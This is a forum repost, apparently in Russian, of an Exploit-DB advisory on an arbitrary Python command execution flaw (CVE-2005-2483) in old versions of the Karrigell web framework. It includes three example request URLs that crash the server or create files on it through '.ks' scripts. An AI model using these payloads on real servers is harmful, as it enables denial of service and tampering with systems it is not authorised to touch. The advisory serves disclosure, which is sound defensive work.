Exploit Karrigell 1.x/2.0/2.1 - '.KS' File Arbitrary Python Command Execution

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
26066
Проверка EDB
  1. Пройдено
Автор
RADOVAN GARABÃK
Тип уязвимости
WEBAPPS
Платформа
CGI
CVE
cve-2005-2483
Дата публикации
2005-07-31
Код:
source: https://www.securityfocus.com/bid/14463/info

Karrigell is susceptible to an arbitrary Python command execution vulnerability. This issue is due to a design flaw that allows remote attackers to execute Python commands that they are not intended to have access to.

Attackers may exploit this vulnerability to execute arbitrary Python commands in the context of the Web server hosting the Karrigell framework. This allows remote malicious users to cause denial of service conditions, create or overwrite arbitrary files, and likely compromise the hosting computer. 

The following examples will cause a denial of service condition:
http://www.example.com/test.ks/raw_input
http://www.example.com/test.ks/file?%22*10000000&mode=w

The following example will create a file on the local filesystem on the hosting computer:
http://www.example.com/test.ks/file?%22*2&mode=w
 
Источник
www.exploit-db.com

Похожие темы